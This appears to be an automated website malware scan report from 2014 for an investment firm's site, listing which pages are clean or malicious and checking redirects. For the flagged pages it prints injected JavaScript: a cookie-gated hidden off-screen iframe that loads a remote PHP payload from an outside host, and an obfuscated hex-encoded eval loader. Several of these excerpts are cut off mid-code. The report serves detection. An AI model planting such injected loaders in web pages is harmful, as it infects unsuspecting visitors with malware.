Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=investmentbankerscorp.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://investmentbankerscorp.com/ | 200 OK Content-Length: 12157 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax';
function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = docume ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); p09(); } } Antivirus reports:
| ||
http://investmentbankerscorp.com/businessOwners.htm | 200 OK Content-Length: 10012 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Managers.htm | 200 OK Content-Length: 9947 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Advisors.htm | 200 OK Content-Length: 9759 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Investors.htm | 200 OK Content-Length: 10183 Content-Type: text/html | clean |
http://investmentbankerscorp.com/index.htm | 200 OK Content-Length: 11781 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax';
function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = docume ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); p09(); } } Antivirus reports:
| ||
http://investmentbankerscorp.com/OurTeam.htm | 200 OK Content-Length: 11745 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Experience.htm | 200 OK Content-Length: 31298 Content-Type: text/html | clean |
http://investmentbankerscorp.com/InvestmentStrategy.htm | 200 OK Content-Length: 16333 Content-Type: text/html | clean |
http://investmentbankerscorp.com/ExitedTransactions.htm | 200 OK Content-Length: 11553 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Portfolio.htm | 200 OK Content-Length: 9034 Content-Type: text/html | clean |
http://investmentbankerscorp.com/Services.htm | 200 OK Content-Length: 12915 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() {
var static='ajax';
var controller='index.php';
var p = document.createElement('iframe');
p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php';
p.style.position = 'absolute';
p.style.color = '9851';
p.style.height = '9851px';
p.style.width = '9851px';
p.style.left = '10009851';
p.style.top = '10009851';
if (!document.getElementById('p')) {
document.write('<p id=\'p\' class=\'p09\' ></p>');
document.getElementById('p').appendChild(p);
}
}
functio Antivirus reports:
| ||
http://investmentbankerscorp.com/mer.asp | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://investmentbankerscorp.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://investmentbankerscorp.com/downloads.htm | 200 OK Content-Length: 17214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_80_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_80_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_74_7c_6d_6b_70_76_77_74_77_6f_71_6d_36_6b_77_75_37_7b_7d_78_78_77_7a_7c_37_6b_74_71_73_36_78_70_78_2f_ Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: investmentbankerscorp.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 16 Sep 2014 20:27:29 GMT
Server: Microsoft-IIS/6.0
Content-Length: 12157
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSRRSDS=MPAGGHDAGLCJJPOHKLNDDGOI; path=/
X-Powered-By: ASP.NET
...12157 bytes of data.
GET / HTTP/1.1
Host: investmentbankerscorp.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 16 Sep 2014 20:27:29 GMT
Server: Microsoft-IIS/6.0
Content-Length: 12157
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSRRSDS=MPAGGHDAGLCJJPOHKLNDDGOI; path=/
X-Powered-By: ASP.NET
...12157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: investmentbankerscorp.com
Referer: http://www.google.com/search?q=investmentbankerscorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: investmentbankerscorp.com
Referer: http://www.google.com/search?q=investmentbankerscorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.